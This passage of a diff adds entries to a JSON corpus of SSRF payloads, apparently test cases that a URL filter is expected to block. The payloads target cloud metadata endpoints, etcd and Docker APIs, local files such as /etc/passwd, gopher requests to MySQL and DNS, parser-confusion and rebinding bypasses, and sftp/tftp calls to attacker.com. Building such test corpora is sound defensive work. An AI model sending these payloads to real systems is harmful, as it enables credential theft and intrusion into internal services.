+ "category": "SSRF"
701
+ },
702
+ {
703
+ "id": "SSRF-CLOUD-062",
704
+ "payload": "http://192.0.0.192/latest/meta-data/",
705
+ "tags": ["oracle", "metadata"],
706
+ "expected_block": true,
707
+ "severity_hint": "High",
708
+ "notes": "Oracle Cloud metadata endpoint",
709
+ "category": "SSRF"
710
+ },
711
+ {
712
+ "id": "SSRF-CLOUD-063",
713
+ "payload": "http://192.0.0.192/latest/user-data/",
714
+ "tags": ["oracle", "metadata", "userdata"],
715
+ "expected_block": true,
716
+ "severity_hint": "High",
717
+ "notes": "Oracle Cloud user-data",
718
+ "category": "SSRF"
719
+ },
720
+ {
721
+ "id": "SSRF-CLOUD-064",
722
+ "payload": "http://169.254.169.254/hetzner/v1/metadata",
723
+ "tags": ["hetzner", "metadata"],
724
+ "expected_block": true,
725
+ "severity_hint": "High",
726
+ "notes": "Hetzner Cloud metadata",
727
+ "category": "SSRF"
728
+ },
729
+ {
730
+ "id": "SSRF-CLOUD-065",
731
+ "payload": "http://169.254.169.254/hetzner/v1/metadata/private-networks",
732
+ "tags": ["hetzner", "metadata", "network"],
733
+ "expected_block": true,
734
+ "severity_hint": "High",
735
+ "notes": "Hetzner private network info",
736
+ "category": "SSRF"
737
+ },
738
+ {
739
+ "id": "SSRF-CLOUD-066",
740
+ "payload": "http://127.0.0.1:2379/v2/keys/?recursive=true",
741
+ "tags": ["kubernetes", "etcd", "keys"],
742
+ "expected_block": true,
743
+ "severity_hint": "Critical",
744
+ "notes": "Kubernetes ETCD keys dump",
745
+ "category": "SSRF"
746
+ },
747
+ {
748
+ "id": "SSRF-CLOUD-067",
749
+ "payload": "http://127.0.0.1:2379/version",
750
+ "tags": ["kubernetes", "etcd", "version"],
751
+ "expected_block": true,
752
+ "severity_hint": "Medium",
753
+ "notes": "Kubernetes ETCD version",
754
+ "category": "SSRF"
755
+ },
756
+ {
757
+ "id": "SSRF-CLOUD-068",
758
+ "payload": "http://127.0.0.1:2375/v1.24/containers/json",
759
+ "tags": ["docker", "api", "containers"],
760
+ "expected_block": true,
761
+ "severity_hint": "Critical",
762
+ "notes": "Docker API container listing",
763
+ "category": "SSRF"
764
+ },
765
+ {
766
+ "id": "SSRF-CLOUD-069",
767
+ "payload": "http://127.0.0.1:2375/images/json",
768
+ "tags": ["docker", "api", "images"],
769
+ "expected_block": true,
770
+ "severity_hint": "Critical",
771
+ "notes": "Docker API images listing",
772
+ "category": "SSRF"
773
+ },
774
+ {
775
+ "id": "SSRF-CLOUD-070",
776
+ "payload": "http://rancher-metadata/latest/",
777
+ "tags": ["rancher", "metadata"],
778
+ "expected_block": true,
779
+ "severity_hint": "High",
780
+ "notes": "Rancher metadata service",
781
+ "category": "SSRF"
782
+ },
783
+ {
784
+ "id": "SSRF-CLOUD-071",
785
+ "payload": "http://169.254.169.254/openstack",
786
+ "tags": ["openstack", "metadata"],
787
+ "expected_block": true,
788
+ "severity_hint": "High",
789
+ "notes": "OpenStack/RackSpace metadata",
790
+ "category": "SSRF"
791
+ },
792
+ {
793
+ "id": "SSRF-CLOUD-072",
794
+ "payload": "http://169.254.169.254/2009-04-04/meta-data/",
795
+ "tags": ["hp", "helion", "metadata"],
796
+ "expected_block": true,
797
+ "severity_hint": "High",
798
+ "notes": "HP Helion metadata",
799
+ "category": "SSRF"
800
+ },
801
+ {
802
+ "id": "SSRF-CLOUD-073",
803
+ "payload": "jar:http://127.0.0.1!/",
804
+ "tags": ["java", "jar", "bypass"],
805
+ "expected_block": true,
806
+ "severity_hint": "High",
807
+ "notes": "JAR scheme SSRF bypass",
808
+ "category": "SSRF"
809
+ },
810
+ {
811
+ "id": "SSRF-CLOUD-074",
812
+ "payload": "jar:https://127.0.0.1!/",
813
+ "tags": ["java", "jar", "bypass", "https"],
814
+ "expected_block": true,
815
+ "severity_hint": "High",
816
+ "notes": "JAR scheme HTTPS SSRF bypass",
817
+ "category": "SSRF"
818
+ },
819
+ {
820
+ "id": "SSRF-CLOUD-075",
821
+ "payload": "http://test???test.com",
822
+ "tags": ["php", "filter_var", "bypass"],
823
+ "expected_block": true,
824
+ "severity_hint": "Medium",
825
+ "notes": "PHP filter_var bypass with question marks",
826
+ "category": "SSRF"
827
+ },
828
+ {
829
+ "id": "SSRF-CLOUD-076",
830
+ "payload": "0://evil.com:80;http://google.com:80/",
831
+ "tags": ["php", "filter_var", "bypass"],
832
+ "expected_block": true,
833
+ "severity_hint": "Medium",
834
+ "notes": "PHP filter_var bypass with zero scheme",
835
+ "category": "SSRF"
836
+ },
837
+ {
838
+ "id": "SSRF-CLOUD-077",
839
+ "payload": "http://127.1.1.1:80\\@127.2.2.2:80/",
840
+ "tags": ["parser", "confusion", "bypass"],
841
+ "expected_block": true,
842
+ "severity_hint": "High",
843
+ "notes": "URL parser confusion bypass",
844
+ "category": "SSRF"
845
+ },
846
+ {
847
+ "id": "SSRF-CLOUD-078",
848
+ "payload": "http://127.1.1.1:80\\@@127.2.2.2:80/",
849
+ "tags": ["parser", "confusion", "bypass"],
850
+ "expected_block": true,
851
+ "severity_hint": "High",
852
+ "notes": "URL parser double-@ confusion",
853
+ "category": "SSRF"
854
+ },
855
+ {
856
+ "id": "SSRF-CLOUD-079",
857
+ "payload": "http://127.1.1.1:80#\\@127.2.2.2:80/",
858
+ "tags": ["parser", "fragment", "bypass"],
859
+ "expected_block": true,
860
+ "severity_hint": "High",
861
+ "notes": "URL parser fragment confusion",
862
+ "category": "SSRF"
863
+ },
864
+ {
865
+ "id": "SSRF-CLOUD-080",
866
+ "payload": "http:127.0.0.1/",
867
+ "tags": ["parser", "scheme", "bypass"],
868
+ "expected_block": true,
869
+ "severity_hint": "Medium",
870
+ "notes": "URL parser scheme confusion (missing slashes)",
871
+ "category": "SSRF"
872
+ },
873
+ {
874
+ "id": "SSRF-CLOUD-081",
875
+ "payload": "http://1.1.1.1 &@2.2.2.2# @3.3.3.3/",
876
+ "tags": ["parser", "multi", "bypass"],
877
+ "expected_block": true,
878
+ "severity_hint": "High",
879
+ "notes": "Multi-parser confusion attack",
880
+ "category": "SSRF"
881
+ },
882
+ {
883
+ "id": "SSRF-CLOUD-082",
884
+ "payload": "gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00",
885
+ "tags": ["gopher", "mysql", "protocol"],
886
+ "expected_block": true,
887
+ "severity_hint": "Critical",
888
+ "notes": "Gopher to MySQL exploitation",
889
+ "category": "SSRF"
890
+ },
891
+ {
892
+ "id": "SSRF-CLOUD-083",
893
+ "payload": "gopher://127.0.0.1:53/%2500%251d%25a9%25c1%2500%2520",
894
+ "tags": ["gopher", "dns", "protocol"],
895
+ "expected_block": true,
896
+ "severity_hint": "High",
897
+ "notes": "Gopher DNS AXFR exploitation",
898
+ "category": "SSRF"
899
+ },
900
+ {
901
+ "id": "SSRF-CLOUD-084",
902
+ "payload": "gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/",
903
+ "tags": ["gopher", "gcp", "bypass"],
904
+ "expected_block": true,
905
+ "severity_hint": "Critical",
906
+ "notes": "Gopher to GCP metadata with headers",
907
+ "category": "SSRF"
908
+ },
909
+ {
910
+ "id": "SSRF-CLOUD-085",
911
+ "payload": "https://307.r3dir.me/--to/?url=http://localhost",
912
+ "tags": ["redirect", "bypass", "307"],
913
+ "expected_block": true,
914
+ "severity_hint": "High",
915
+ "notes": "307 redirect service bypass",
916
+ "category": "SSRF"
917
+ },
918
+ {
919
+ "id": "SSRF-CLOUD-086",
920
+ "payload": "https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me",
921
+ "tags": ["redirect", "bypass", "302"],
922
+ "expected_block": true,
923
+ "severity_hint": "Critical",
924
+ "notes": "302 redirect to AWS metadata",
925
+ "category": "SSRF"
926
+ },
927
+ {
928
+ "id": "SSRF-CLOUD-087",
929
+ "payload": "make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms",
930
+ "tags": ["dns", "rebinding", "1u.ms"],
931
+ "expected_block": true,
932
+ "severity_hint": "Critical",
933
+ "notes": "DNS rebinding via 1u.ms service",
934
+ "category": "SSRF"
935
+ },
936
+ {
937
+ "id": "SSRF-CLOUD-088",
938
+ "payload": "file:///etc/passwd",
939
+ "tags": ["file", "lfi", "linux"],
940
+ "expected_block": true,
941
+ "severity_hint": "Critical",
942
+ "notes": "File scheme to read local files",
943
+ "category": "SSRF"
944
+ },
945
+ {
946
+ "id": "SSRF-CLOUD-089",
947
+ "payload": "file://\\/\\/etc/passwd",
948
+ "tags": ["file", "lfi", "bypass"],
949
+ "expected_block": true,
950
+ "severity_hint": "Critical",
951
+ "notes": "File scheme with backslash bypass",
952
+ "category": "SSRF"
953
+ },
954
+ {
955
+ "id": "SSRF-CLOUD-090",
956
+ "payload": "dict://127.0.0.1:11211/stat",
957
+ "tags": ["dict", "memcached", "protocol"],
958
+ "expected_block": true,
959
+ "severity_hint": "High",
960
+ "notes": "Dict protocol to memcached",
961
+ "category": "SSRF"
962
+ },
963
+ {
964
+ "id": "SSRF-CLOUD-091",
965
+ "payload": "sftp://attacker.com:22/",
966
+ "tags": ["sftp", "exfiltration"],
967
+ "expected_block": true,
968
+ "severity_hint": "High",
969
+ "notes": "SFTP protocol exploitation",
970
+ "category": "SSRF"
971
+ },
972
+ {
973
+ "id": "SSRF-CLOUD-092",
974
+ "payload": "tftp://attacker.com:69/file",
975
+ "tags": ["tftp", "exfiltration"],
976
+ "expected_block": true,
977
+ "severity_hint": "Medium",
978
+ "notes": "TFTP protocol exploitation",
979
+ "category": "SSRF"
980
+ },
981
+ {
982
+ "id": "SSRF-CLOUD-093",
983
+ "payload": "ldap://127.0.0.1:389/",
984
+ "tags": ["ldap", "internal", "protocol"],
985
+ "expected_block": true,
986
+ "severity_hint": "High",
987
+ "notes": "LDAP protocol internal access",
988
+ "category": "SSRF"
989
+ },
990
+ {
991
+ "id": "SSRF-CLOUD-094",
992
+ "payload": "netdoc:///etc/passwd",
993
+ "tags": ["netdoc", "java", "lfi"],
994
+ "expected_block": true,
995
+ "severity_hint": "High",
996
+ "notes": "Java netdoc scheme for file read",
997
+ "category": "SSRF"
998
+ }
999
+ ]